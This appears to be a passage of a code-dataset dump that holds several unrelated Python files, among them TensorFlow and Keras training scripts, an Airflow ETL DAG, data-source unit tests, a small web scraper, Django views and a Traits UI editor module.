y[shuffle_indices]\n\n\n# Split the training and validation sets\n# TODO: This is very crude, should use cross-validation\ndev_sample_index = -1 * int(FLAGS.validation_percentage * float(len(y)))\nx_train, x_dev = x_shuffled[:dev_sample_index], x_shuffled[dev_sample_index:]\ny_train, y_dev = y_shuffled[:dev_sample_index], y_shuffled[dev_sample_index:]\nprint(\"Train/Dev split: {:d}/{:d}\".format(len(y_train), len(y_dev)))\n\n# Training\n# =======================================================\n\nwith tf.Graph().as_default():\n\n # Session configuration\n session_conf = tf.ConfigProto(\n allow_soft_placement = FLAGS.allow_soft_placement,# allow TF to pick another device if the requested one does not exist\n\tlog_device_placement = FLAGS.log_device_placement) # whether to log device placement\n\n # Create the session\n sess = tf.Session(config = session_conf)\n with sess.as_default():\n\n # Build the CNN model\n cnn = TextCNN(\n\t sequence_length = x_train.shape[1], # input sequence length\n\t num_classes = y_train.shape[1], # number of output classes\n\t embedding_size = FLAGS.embedding_dim,# embedding dimensionality\n\t filter_sizes = list(map(int, FLAGS.filter_sizes.split(\",\"))),# filter sizes\n\t num_filters = FLAGS.num_filters, # number of filters\n\t l2_reg_lambda = FLAGS.l2_reg_lambda) # L2 regularization parameter\n\n # Define the training procedure\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)# number of training steps taken\n optimizer = tf.train.AdamOptimizer(1e-3) # optimization algorithm\n grads_and_vars = optimizer.compute_gradients(cnn.loss) # compute the gradients\n train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)# apply the gradients\n\n # Track gradient values and sparsity\n grad_summaries = []\n for g, v in grads_and_vars:\n if g is not None:\n grad_hist_summary = tf.summary.histogram(\"{}/grad/hist\".format(v.name), g)\n sparsity_summary = tf.summary.scalar(\"{}/grad/sparsity\".format(v.name), tf.nn.zero_fraction(g))\n grad_summaries.append(grad_hist_summary)\n grad_summaries.append(sparsity_summary)\n grad_summaries_merged = tf.summary.merge(grad_summaries)\n\n # Output path\n print(\"Writing to {}\\n\".format(out_dir))\n\n # Loss and accuracy summaries\n loss_summary = tf.summary.scalar(\"loss\", cnn.loss)\n acc_summary = tf.summary.scalar(\"accuracy\", cnn.accuracy)\n\n # Training summaries\n train_summary_op = tf.summary.merge([loss_summary, acc_summary, grad_summaries_merged])\n train_summary_dir = os.path.join(out_dir, \"summaries\", \"train\")\n train_summary_writer = tf.summary.FileWriter(train_summary_dir, sess.graph)\n\n # Validation summaries\n dev_summary_op = tf.summary.merge([loss_summary, acc_summary])\n dev_summary_dir = os.path.join(out_dir, \"summaries\", \"dev\")\n dev_summary_writer = tf.summary.FileWriter(dev_summary_dir, sess.graph)\n\n # Checkpoint storage\n checkpoint_dir = os.path.abspath(os.path.join(out_dir, \"checkpoints\"))\n checkpoint_prefix = os.path.join(checkpoint_dir, \"model\")\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=FLAGS.num_checkpoints)\n\n # Initialize all variables\n sess.run(tf.global_variables_initializer())\n\n # One training step\n def train_step(x_batch, y_batch):\n \"\"\"\n A single training step\n \"\"\"\n feed_dict = {\n cnn.input_x: x_batch,\n cnn.input_y: y_batch,\n cnn.dropout_keep_prob: FLAGS.dropout_keep_prob\n }\n _, step, summaries, loss, accuracy = sess.run(\n [train_op, global_step, train_summary_op, cnn.loss, cnn.accuracy],\n feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, step, loss, accuracy))\n train_summary_writer.add_summary(summaries, step)\n\n # One validation step\n def dev_step(x_batch, y_batch, writer=None):\n \"\"\"\n Evaluates model on a dev set\n \"\"\"\n feed_dict = {\n cnn.input_x: x_batch,\n cnn.input_y: y_batch,\n cnn.dropout_keep_prob: 1.0\n }\n step, summaries, loss, accuracy = sess.run(\n [global_step, dev_summary_op, cnn.loss, cnn.accuracy],\n feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, step, loss, accuracy))\n if writer:\n writer.add_summary(summaries, step)\n\n # Generate batches\n batches = data_process_tool.batch_iter(\n list(zip(x_train, y_train)), FLAGS.batch_size, FLAGS.num_steps)\n\n # Training loop\n for batch in batches:\n x_batch, y_batch = zip(*batch)\n train_step(x_batch, y_batch)\n current_step = tf.train.global_step(sess, global_step)\n if current_step % FLAGS.evaluate_every == 0:\n print(\"\\nEvaluation:\")\n dev_step(x_dev, y_dev, writer=dev_summary_writer)\n print(\"\")\n if current_step % FLAGS.checkpoint_every == 0:\n path = saver.save(sess, checkpoint_prefix, global_step=current_step)\n print(\"Saved model checkpoint to {}\\n\".format(path))","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280072641","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 28 20:09:19 2017\n\n@author: Adwait\n\"\"\"\n# given values\n# balance - the outstanding balance on the credit card\n\n# annualInterestRate - annual interest rate as a decimal\n\n# monthlyPaymentRate - minimum monthly payment rate as a decimal\n\ndef yearbalance(balance,annualInterestRate,monthlyPayment):\n itr=0\n while itr<12:\n balance=round((balance-monthlyPayment)*(1+annualInterestRate/12),2)\n itr+=1\n \n return balance\n \nmonthlyPayment=0 \nbalance=10000\nannualInterestRate=11.32 \nwhile yearbalance(balance, annualInterestRate, monthlyPayment)>0: \n monthlyPayment+=10\nprint('Lowest Payment: ', monthlyPayment)\n ","sub_path":"credit card bal initial.py","file_name":"credit card bal initial.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220973601","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('TKAgg')\nimport matplotlib.pyplot as plt\n\n\n@np.vectorize\ndef plot(_, N):\n n = N + 1\n W = np.sqrt(1 / N) * np.random.randn(1, N)\n t = np.linspace(0, 1, n)\n B = np.insert(np.cumsum(W[0, :]), 0, 0)\n plt.plot(t, B, linewidth=0.2)\n\n\ndef constrain(N):\n fn = np.vectorize(lambda x: np.sqrt(x) * 3)\n n = N + 1\n t = np.linspace(0, 1, n)\n x = fn(t)\n plt.plot(t, x, 'k', linewidth=2)\n plt.plot(t, -1 * x, 'k', linewidth=2)\n\n\nN = 1000\nM = 500\n\nplot(range(M), N)\nconstrain(N)\n\nplt.grid(True)\nplt.show()\n","sub_path":"ex2.1.py","file_name":"ex2.1.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32860563","text":"from __future__ import unicode_literals\nfrom io import BytesIO, StringIO\nimport unittest\n\nfrom saucebrush.sources import (\n CSVSource, FixedWidthFileSource, HtmlTableSource, JSONSource)\n\nclass SourceTestCase(unittest.TestCase):\n\n def _get_csv(self):\n data = '''a,b,c\n1,2,3\n5,5,5\n1,10,100'''\n return StringIO(data)\n\n def test_csv_source_basic(self):\n source = CSVSource(self._get_csv())\n expected_data = [{'a':'1', 'b':'2', 'c':'3'},\n {'a':'5', 'b':'5', 'c':'5'},\n {'a':'1', 'b':'10', 'c':'100'}]\n self.assertEqual(list(source), expected_data)\n\n def test_csv_source_fieldnames(self):\n source = CSVSource(self._get_csv(), ['x','y','z'])\n expected_data = [{'x':'a', 'y':'b', 'z':'c'},\n {'x':'1', 'y':'2', 'z':'3'},\n {'x':'5', 'y':'5', 'z':'5'},\n {'x':'1', 'y':'10', 'z':'100'}]\n self.assertEqual(list(source), expected_data)\n\n def test_csv_source_skiprows(self):\n source = CSVSource(self._get_csv(), skiprows=1)\n expected_data = [{'a':'5', 'b':'5', 'c':'5'},\n {'a':'1', 
'b':'10', 'c':'100'}]\n self.assertEqual(list(source), expected_data)\n\n def test_fixed_width_source(self):\n data = StringIO('JamesNovember 3 1986\\nTim September151999')\n fields = (('name',5), ('month',9), ('day',2), ('year',4))\n source = FixedWidthFileSource(data, fields)\n expected_data = [{'name':'James', 'month':'November', 'day':'3',\n 'year':'1986'},\n {'name':'Tim', 'month':'September', 'day':'15',\n 'year':'1999'}]\n self.assertEqual(list(source), expected_data)\n\n def test_json_source(self):\n\n content = StringIO(\"\"\"[{\"a\": 1, \"b\": \"2\", \"c\": 3}]\"\"\")\n\n js = JSONSource(content)\n self.assertEqual(list(js), [{'a': 1, 'b': '2', 'c': 3}])\n\n def test_html_table_source(self):\n\n content = StringIO(\"\"\"\n <table id=\"thetable\">\n <tr>\n <th>a</th>\n <th>b</th>\n <th>c</th>\n </tr>\n <tr>\n <td>1</td>\n <td>2</td>\n <td>3</td>\n </tr>\n </table>
\n \n \"\"\")\n\n try:\n\n import lxml\n\n hts = HtmlTableSource(content, 'thetable')\n self.assertEqual(list(hts), [{'a': '1', 'b': '2', 'c': '3'}])\n\n except ImportError:\n # Python 2.6 doesn't have skipTest. We'll just suffer without it.\n if hasattr(self, 'skipTest'):\n self.skipTest(\"lxml is not installed\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"saucebrush/tests/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140170779","text":"\nfrom __future__ import print_function\n\nimport time\nfrom builtins import range\nfrom pprint import pprint\n\nfrom airflow.utils.dates import days_ago\n\nfrom airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator, BranchPythonOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash_operator import BashOperator\nimport pickle\nfrom airflow.hooks.base_hook import BaseHook\nfrom multiprocessing import Process, Lock, Pool, cpu_count\nimport cx_Oracle\nimport pandas as pd\nimport calendar\nfrom datetime import datetime, timedelta\nfrom dateutil import relativedelta\nimport os\nimport shutil\nimport sys\nsys.path.append(\"/root/Documents/Projects/CustomModules/\")\nfrom etlRunnerTemplate import *\n\nargs = {\n 'owner': 'EtlRunner',\n 'start_date': days_ago(2)\n}\n\ndag = DAG(\n dag_id='air_etl_airtime_transact',\n default_args=args,\n schedule_interval=\"@weekly\",\n tags=['airtime'],\n)\n\netl_args = {\n \"dest_table_name\" : \"air_etl_airtime_transact\",\n \"dest_table_columns_definition\" : {\n \"BRA_CODE\":(\"Number(4)\", int), \n \"CUS_NUM\":(\"Number(7)\", int), \n \"SELF_AIRTIME_COUNT\":(\"Number\", int), \n \"SELF_AIRTIME_VALUE\":(\"Number\", float), \n \"TOTAL_AIRTIME_COUNT\":(\"Number\", int), \n \"TOTAL_AIRTIME_VALUE\":(\"Number\", float)}, # highlights destination table fields excluding reference_dates and control_dates; simply agg_columns and agg_measures\n \"source_query\" : \"\"\"select tra_date,a.bra_code,a.cus_num,tra_amt,crnt_bal,lpad(substr(remarks,-10),11,0) receiver_mob_num,\n b.cus_mobile sender_cus_mobile,b.cus_telephone sender_cus_telephone\n from stg.src_transact a, stg.src_customer_extd@exadata_new b\n where a.bra_code=b.bra_code and a.cus_num=b.cus_num\n and a.expl_code=32 and can_rea_code=0 and a.cus_num>99999 and deb_cre_ind=1\"\"\",\n \"etl_period\" : EtlPeriod.MONTHLY,\n \"etl_period_freq\" : 12,\n \"source_control_date_field_name\" : \"TRA_DATE\",\n \"agg_columns\" : [\"BRA_CODE\",\"CUS_NUM\"], # optional\n \"agg_measures\" : [\n (\"COUNT(CASE WHEN RECEIVER_MOB_NUM=SENDER_CUS_MOBILE OR RECEIVER_MOB_NUM=SENDER_CUS_TELEPHONE THEN 1 END)\",\"SELF_AIRTIME_COUNT\"),\n (\"NVL(SUM(CASE WHEN RECEIVER_MOB_NUM=SENDER_CUS_MOBILE OR RECEIVER_MOB_NUM=SENDER_CUS_TELEPHONE THEN TRA_AMT END),0)\", \"SELF_AIRTIME_VALUE\"),\n (\"COUNT(1)\", \"TOTAL_AIRTIME_COUNT\"),\n (\"NVL(SUM(TRA_AMT),0)\", \"TOTAL_AIRTIME_VALUE\")],\n \"optimize_extraction\":True,\n \"dest_reference_date_field_name\" : None, #optional\n \"dest_control_date_field_name\" : None, #optional\n \"etl_end_date\" : None, #optional\n \"staging_directory\":None, #optional\n}\n\ndagWrapper = ETLDagWrapper(dag, etl_args)\n\ndagWrapper.task_does_destination_table_exists >> [dagWrapper.task_create_destination_table, dagWrapper.task_filter_sourcing_sql_dates] >> dagWrapper.task_dress_sourcing_sql_queries\ndagWrapper.task_dress_sourcing_sql_queries >> 
dagWrapper.task_does_staging_directory_exists\ndagWrapper.task_does_staging_directory_exists >> [dagWrapper.task_clear_staging_directory, dagWrapper.task_create_staging_directory] >> dagWrapper.task_extract_starts\nfor d_from, d_to in dagWrapper.etl_args[\"sourcing_sql_dates\"]:\n cur_operator = PythonOperator(\n task_id=f\"extract_{d_from}_{d_to}\",\n provide_context=True,\n python_callable=dagWrapper.extract,\n op_kwargs={\"d_from\":d_from, \"d_to\":d_to},\n dag=dag,\n # trigger_rule='none_failed_or_skipped'\n )\n dagWrapper.task_extract_starts >> cur_operator >> dagWrapper.task_extract_ends\ndagWrapper.task_extract_ends >> dagWrapper.task_load >> dagWrapper.task_unique_test\n\n","sub_path":"etl_airtime_recharges.py","file_name":"etl_airtime_recharges.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"556788366","text":"'''\nIMDb top 250 movies: save the Xunlei (Thunder) download links to the films.txt file\n'''\nfrom bs4 import BeautifulSoup\nimport requests\n\nf = open('files/films.txt', 'a')\nurl = \"http://www.cnblogs.com/shangdawei/p/4306621.html\"\nhtml = requests.get(url)\nsoup = BeautifulSoup(html.text, 'html.parser')\nlinks = soup.select(\"div #cnblogs_post_body > p > a\")\nfor link in links:\n print(link.attrs[\"href\"])\n f.write(link.attrs[\"href\"]+'\\n')","sub_path":"imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202068720","text":"# Load Libraries\nimport numpy as np\nimport tensorflow as tf\nfrom keras.models import Model\nfrom keras import regularizers\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers import Input, LSTM, Embedding\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\n#from . 
import model_preproecess\nimport model_preproecess\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nwith tf.device(\"/GPU:0\"):\n\n def simple_lstm(max_len=74, emb_dim=32, max_vocab_len=100, lstm_output_size=32, W_reg=regularizers.l2(1e-4)):\n # Input\n main_input = Input(shape=(max_len,), dtype='int32', name='main_input')\n\n # Embedding layer\n emb = Embedding(input_dim=max_vocab_len, output_dim=emb_dim,\n input_length=max_len, dropout=0.2, W_regularizer=W_reg)(main_input)\n\n # LSTM layer\n lstm = LSTM(lstm_output_size)(emb)\n lstm = Dropout(0.5)(lstm)\n\n # Output layer (last fully connected layer)\n output = Dense(21, activation='sigmoid', name='output')(lstm)\n\n # Compile model and define optimizer\n model = Model(input=[main_input], output=[output])\n adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', preprocess.fmeasure, preprocess.recall, preprocess.precision])\n\n return model\n\nwith tf.device(\"/GPU:0\"):\n epochs = 10\n batch_size = 64\n\n preprocess = model_preproecess.Preprocessor()\n\n X_train, X_test, y_train, y_test = preprocess.load_data()\n\n model = simple_lstm()\n history = model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size)\n\n history_dict = history.history\n print(history_dict.keys())\n #epochs = range(1, len(history_dict['loss']) + 1)\n\n # \"bo\" is for \"blue dot\"\n #plt.plot(epochs, history_dict['fmeasure'], 'r',label='f1')\n #plt.plot(epochs, history_dict['precision'], 'g',label='precision')\n #plt.plot(epochs, history_dict['recall'], 'k',label='recall')\n\n #plt.xlabel('Epochs')\n #plt.grid()\n #plt.legend(loc=1)\n #plt.show()\n\n y_pred_class_prob = model.predict(X_test, batch_size=64)\n y_pred_class = np.argmax(y_pred_class_prob, axis=1)\n y_test_class = np.argmax(y_test, axis=1)\n y_val_class = y_test_class\n\n print (\"precision\" , metrics.precision_score(y_val_class, y_pred_class, average = 'weighted'))\n print (\"recall\" , metrics.recall_score(y_val_class, y_pred_class, average = 'weighted'))\n print (\"f1\" , metrics.f1_score(y_val_class, y_pred_class, average = 'weighted'))\n\n print(classification_report(y_val_class, y_pred_class, digits=4))\n\n # Save final training model\n # model_name = \"LSTM\"\n # preprocess.save_model(model, \"../models/\" + model_name + \".json\", \"../models/\" + model_name + \".h5\")\n","sub_path":"dke/cs/knu/models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79729934","text":"# pre-processing.py\nfrom scipy.signal import butter, lfilter\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# D = 151\n# Intervel = 100\n\n\ndef load_collect(D, Intervel):\n data = []\n labels = []\n for label, name in enumerate(['downstair', 'still', 'upstair', 'walking', 'running']):\n with open('collect/'+name, 'rb') as f:\n d = pickle.load(f)\n\n d = filter_array(d, D, Intervel)\n data.append(d)\n labels.append(np.ones(d.shape[0]) * label)\n\n data = np.concatenate(data, axis=0)\n labels = np.concatenate(labels, axis=0)\n return data, labels\n\n\ndef filter_array(pp_data, D, Intervel):\n out = []\n for i in range(int(np.floor((pp_data.shape[0]-D) / float(Intervel)))):\n part = pp_data[Intervel * i: Intervel * i + D]\n fx, fy, fz = filtering(part[:, 0], part[:, 1], part[:, 2])\n # fx, fy, fz = part[:, 0], part[:, 1], part[:, 2]\n 
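# Stack the three filtered axes into one flat feature vector per window.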
out.append(np.concatenate([fx, fy, fz], axis=0))\n return np.array(out)\n\n\ndef read(filename):\n with open(filename, 'r') as f:\n string = f.read()\n data = []\n index = 0\n while index < len(string) - 10:\n x_ind = string[index:].find('x')\n y_ind = string[index:].find('y')\n z_ind = string[index:].find('z')\n timestamp_ind = string[index:].find('timestamp')\n x = float(string[index + x_ind + 2: index + y_ind - 1])\n y = float(string[index + y_ind + 2: index + z_ind - 1])\n z = float(string[index + z_ind + 2: index + timestamp_ind - 1])\n next_x_ind = string[index + x_ind + 2:].find('x')\n if next_x_ind == -1:\n break\n # timestamp = float(string[index + timestamp_ind + 10: index + x_ind + next_x_ind - 2])\n data.append((10*x, 10*y, 10*z, None))\n index = index + x_ind + next_x_ind - 2\n return data\n#\n# def readmyown(filename):\n# with open(filename, 'r') as f:\n# lines = f.readlines()\n# data = []\n# for l in lines:\n# if l[0] != 'X':\n# continue\n# x_ind = l.find('X')\n# y_ind = l.find('Y')\n# z_ind = l.find('Z')\n# x = float(l[x_ind + 4 : y_ind - 1])\n# y = float(l[y_ind + 4 : z_ind - 2])\n# z = float(l[z_ind + 4 : ])\n# data.append((x, y, z, None))\n# return data\n\n\ndef filtering(fx, fy, fz):\n assert fx.ndim==1 and fy.ndim==1 and fz.ndim==1 , 'fx fy fz must be 1-d'\n fc = 0.3 # filter cutoff\n fs = 50 # frequency rate of the signal\n [but, att] = butter(6, fc / (fs / 2.)) # Butterworth filter creation\n gx = lfilter(but, att, fx)\n gy = lfilter(but, att, fy)\n gz = lfilter(but, att, fz)\n fx = fx - gx\n fy = fy - gy\n fz = fz - gz\n return fx, fy, fz\n\n\ndef plot_acc():\n mlp = [92.86, 92.98, 92.37, 94.60, 94.86, 95.11, 94.67, 92.64, 94.48, 89.66, 87.31, 74.90, 62.89, 53.65]\n lr = [62.86, 59.09, 57.25, 74.92, 78.00, 74.89, 75.05, 71.83, 70.98, 70.88, 65.40, 62.65, 62.47, 56.67]\n knn = [90.48, 92.15, 91.98, 94.57, 94.92, 96.00, 94.67, 96.83, 96.86, 96.64, 96.10, 93.88, 91.35, 80.91]\n dt = [76.19, 83.88, 81.30, 86.86, 87.94, 87.11, 87.24, 87.44, 88.96, 89.02, 90.33, 87.55, 86.18, 82.45]\n n_features = [150, 130, 120, 100, 90, 70, 60, 40, 30, 20, 10, 5, 3, 1]\n n_features_log = [np.log(a) for a in n_features]\n\n sns.set()\n plt.plot(n_features, mlp, 'r')\n plt.plot(n_features, lr, 'g')\n plt.plot(n_features, knn, 'b')\n plt.plot(n_features, dt, 'k')\n plt.legend(['MLP', 'LR', 'KNN', 'DT'], loc=4)\n plt.show(block=True)\n\n\nif __name__ == '__main__':\n plot_acc()\n exit(0)\n data = read('collect/running.txt')\n pp_data = np.array([[x, y, z] for x, y, z, _ in data])\n with open('collect/running', 'wb') as f:\n pickle.dump(pp_data, f)\n exit(0)","sub_path":"Recognition/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227996771","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import render\nfrom .models import Character, Fighter, Mage, Cleric, Thief\n\ndef index(request):\n return HttpResponse(\"Character Creator App!\")\n\n@login_required\ndef view_all_characters(request):\n characters = Character.objects.all()\n context = {'characters': characters}\n return render(request, 'characters/index.html', context)\n\n@login_required\ndef view_character(request, character_id):\n try:\n character = Character.objects.get(pk=character_id)\n context = {'character': character}\n return render(request, 'characters/detail.html', context)\n except 
Character.DoesNotExist:\n raise Http404(\"No Character matches the given query.\")\n\n@login_required\ndef view_all_items(request, character_id):\n character = Character.objects.get(pk=character_id) \n items = character.inventory.get_queryset()\n context = {'items': items}\n return render(request, 'characters/items.html', context)\n\n@login_required\ndef view_item(request, character_id, item_id):\n try:\n character = Character.objects.get(pk=character_id) \n item = character.inventory.get(pk=item_id)\n context = {'item': item}\n return render(request, 'characters/item_details.html', context)\n except Character.DoesNotExist:\n raise Http404(\"No Items matches the given query.\")","sub_path":"rpg/charactercreator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"544574699","text":"#------------------------------------------------------------------------------\n# Copyright (c) 2005, Enthought, Inc.\n# All rights reserved.\n# \n# This software is provided without warranty under the terms of the BSD\n# license included in enthought/LICENSE.txt and may be redistributed only\n# under the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n# Thanks for using Enthought open source!\n# \n# Author: David C. Morrill\n# Date: 12/02/2004\n# Description: Define the Tkinter implementation of the various instance editors\n# and the instance editor factory.\n#\n# Symbols defined: ToolkitEditorFactory\n#\n#------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# Imports:\n#-------------------------------------------------------------------------------\n\nimport tk\n\nfrom enthought.traits.api import HasTraits, Str, Undefined\nfrom enthought.traits.ui.view import kind_trait\nfrom editor_factory import EditorFactory\nfrom editor import Editor\nfrom constants import scrollbar_dx\n\n#-------------------------------------------------------------------------------\n# 'ToolkitEditorFactory' class:\n#-------------------------------------------------------------------------------\n\nclass ToolkitEditorFactory ( EditorFactory ):\n \n #---------------------------------------------------------------------------\n # Trait definitions:\n #---------------------------------------------------------------------------\n \n label = Str # Optional label for button\n view = Str # Optional name of the instance view to use\n kind = kind_trait # Kind of pop-up editor (live, modal, nonmodal, wizard)\n \n #---------------------------------------------------------------------------\n # 'Editor' factory methods:\n #---------------------------------------------------------------------------\n \n def simple_editor ( self, ui, object, name, description, parent ):\n return SimpleEditor( parent,\n factory = self, \n ui = ui, \n object = object, \n name = name, \n description = description ) \n \n def custom_editor ( self, ui, object, name, description, parent ):\n return CustomEditor( parent,\n factory = self, \n ui = ui, \n object = object, \n name = name, \n description = description ) \n \n#-------------------------------------------------------------------------------\n# 'SimpleEditor' class:\n#-------------------------------------------------------------------------------\n \nclass SimpleEditor ( Editor ):\n \n 
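# Simple style of editor: shows a button that pops up a separate traits UI
# dialog for editing the object when it is clicked.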
#---------------------------------------------------------------------------\n    # Finishes initializing the editor by creating the underlying toolkit\n    # widget:\n    #---------------------------------------------------------------------------\n    \n    def init ( self, parent ):\n        \"\"\" Finishes initializing the editor by creating the underlying toolkit\n            widget.\n        \"\"\"\n        self.control = wx.Button( parent, -1, '' )\n        wx.EVT_BUTTON( parent, self.control.GetId(), self.edit_instance )\n    \n    #---------------------------------------------------------------------------\n    # Edit the contents of the object trait when the user clicks the button:\n    #---------------------------------------------------------------------------\n    \n    def edit_instance ( self, event ):\n        \"\"\" Edit the contents of the object trait when the user clicks the button.\n        \"\"\"\n        # Create the user interface:\n        ui = self.value.edit_traits( self.factory.view, self.control, \n                                     self.factory.kind )\n        \n        # Chain our undo history to the new user interface if it does not have\n        # its own:\n        if ui.history is Undefined:\n            ui.history = self.ui.history\n    \n    #---------------------------------------------------------------------------\n    # Updates the editor when the object trait changes external to the editor:\n    #---------------------------------------------------------------------------\n    \n    def update_editor ( self ):\n        \"\"\" Updates the editor when the object trait changes external to the \n            editor.\n        \"\"\"\n        value = self.value\n        # Start from the factory label; fall back to the value's class name\n        # (without this assignment 'label' is unbound whenever a label is set):\n        label = self.factory.label\n        if label == '':\n            label = 'None'\n            if value is not None:\n                label = value.__class__.__name__\n        self.control.SetLabel( label )\n        self.control.Enable( isinstance( value, HasTraits ) )\n    \n#-------------------------------------------------------------------------------\n# 'CustomEditor' class:\n#-------------------------------------------------------------------------------\n    \nclass CustomEditor ( Editor ):\n    \n    #---------------------------------------------------------------------------\n    # Finishes initializing the editor by creating the underlying toolkit\n    # widget:\n    #---------------------------------------------------------------------------\n    \n    def init ( self, parent ):\n        \"\"\" Finishes initializing the editor by creating the underlying toolkit\n            widget.\n        \"\"\"\n        # Create a panel to hold the object trait's view:\n        self.control = wx.ScrolledWindow( parent, -1 )\n        self.control.SetAutoLayout( True )\n    \n    #---------------------------------------------------------------------------\n    # Updates the editor when the object trait changes external to the editor:\n    #---------------------------------------------------------------------------\n    \n    def update_editor ( self ):\n        \"\"\" Updates the editor when the object trait changes external to the \n            editor.\n        \"\"\"\n        panel = self.control\n        panel.SetSizer( None )\n        panel.DestroyChildren()\n        sizer = wx.BoxSizer( wx.VERTICAL )\n        value = self.value\n        if not isinstance( value, HasTraits ):\n            control = wx.StaticText( panel, -1, self.str_value )\n        else:\n            view = value.trait_view( self.factory.view )\n            self._ui = ui = view.ui( value, panel, 'subpanel' )\n            control = ui.control\n            # Chain the sub-panel's undo history to ours:\n            ui.history = self.ui.history\n        sizer.Add( control, 0, wx.EXPAND )\n        panel.SetAutoLayout( True )\n        panel.SetSizer( sizer )\n        panel.SetScrollRate( 16, 16 )\n        width, height = control.GetSize()\n        panel.SetSize( wx.Size( width + scrollbar_dx, height ) )\n        
panel.GetParent().Layout()\n\n","sub_path":"lib/enthought/traits/ui/tk/instance_editor.py","file_name":"instance_editor.py","file_ext":"py","file_size_in_byte":7161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45030185","text":"# -*- coding: utf8 -*-\n\nfrom base.player import Player\nfrom interfaces import ControllerApi\nfrom widgets.notify import NotifyWidget\n\n\nclass FmMode(object):\n    \"\"\"some notes on fm mode\n\n    When we switch to fm playback mode, each request to the server returns a few songs,\n    so once those songs have finished playing we have to ask the server for the next batch.\n    \"\"\"\n    _api = None\n    _player = None\n    _notify = None\n    _songs = []    # brief music model\n\n    @classmethod\n    def load(cls):\n\n        cls._notify = NotifyWidget()\n\n        cls._api = ControllerApi.api\n        cls._player = Player()\n        cls._player.stop()\n\n        cls.reset_song_list()\n\n    @classmethod\n    def reset_song_list(cls):\n        cls._player.clear_playlist()\n        if len(cls._songs) > 0:\n            song = cls._songs.pop()\n            mid = song['id']\n            music_models = cls._api.get_song_detail(mid)\n            if not ControllerApi.api.is_response_ok(music_models):\n                cls.exit_fm()\n                return\n            cls._player.set_music_list([music_models[0]])\n        else:\n            cls._songs = cls._api.get_radio_songs()\n            if not ControllerApi.api.is_response_ok(cls._songs):\n                cls._player.stop()\n                cls._notify.show_message(\"Error\", \"网络异常,请检查网络连接\")\n                cls.exit_fm()\n            else:\n                cls.reset_song_list()\n\n    @classmethod\n    def load_fm(cls):\n        \"\"\"start FM playback\n\n        1. webkit loads the FM playback page, which allows some animation and design\n        2. FM playback keeps requesting songs from the server, so the logic differs\n           a little from normal playback\n        \"\"\"\n        ControllerApi.state['fm'] = True\n        ControllerApi.player.change_player_mode()\n        ControllerApi.notify_widget.show_message(\"Info\", \"进入FM播放模式\")\n        cls.load()\n        ControllerApi.player.signal_playlist_finished.connect(FmMode.on_next_music_required)\n\n    @classmethod\n    def exit_fm(cls):\n        \"\"\"if a song gets played from the webview, leave fm mode; this logic is temporary\n        \"\"\"\n        if ControllerApi.state['fm']:\n            ControllerApi.player.change_player_mode()\n            ControllerApi.notify_widget.show_message(\"O(∩_∩)O\", \"退出FM播放模式\")\n            FmMode.exit()\n            ControllerApi.state['fm'] = False\n\n    @classmethod\n    def on_next_music_required(cls):\n        cls.reset_song_list()\n\n    @classmethod\n    def exit(cls):\n        cls._player = None\n        cls._api = None\n        cls._notify = None\n","sub_path":"src/c/fm.py","file_name":"fm.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"24535973","text":"from flask import Blueprint, request\nfrom donare.lib.api.helper import (api_response, valid_email, db_date_parse)\nfrom donare.core import app, db\nfrom donare.models import (User, Post, Message, Country, BloodType,\n                           Notification)\nfrom 